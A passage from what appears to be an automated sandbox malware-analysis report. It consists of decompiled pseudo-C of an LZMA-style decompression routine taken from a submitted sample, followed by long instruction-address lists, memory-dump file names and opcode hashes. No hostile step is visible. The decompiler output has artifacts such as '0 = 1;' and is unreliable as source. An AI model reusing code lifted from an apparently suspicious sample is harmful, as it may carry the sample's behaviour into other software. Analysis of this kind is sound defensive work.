											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                      0x00406481
                      0x00406481
                      0x00406481
                      0x00406481
                      0x00406487
                      0x0040648b
                      0x0040648f
                      0x00406499
                      0x004064a7
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00000000
                      0x00000000
                      0x004067ba
                      0x004067c3
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x00406811
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406813
                      0x00406813
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x004068c8
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x00406796
                      0x0040679c
                      0x004067a3
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x00000000
                      0x004067ae
                      0x00406818
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00405edf
                      0x00000000
                      0x00405ee6
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef0
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4b
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f95
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fbf
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x00406005
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x004068bc
                      0x00000000
                      0x004068bc
                      0x00406713
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x00000000
                      0x004060d9
                      0x00406053
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00406398
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00406688
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x0040678a
                      0x00406745
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00000000
                      0x0040646a
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x0040678a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004064af
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x00406548
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004067b4
                      0x0040677d

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                      • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                      • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                      • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
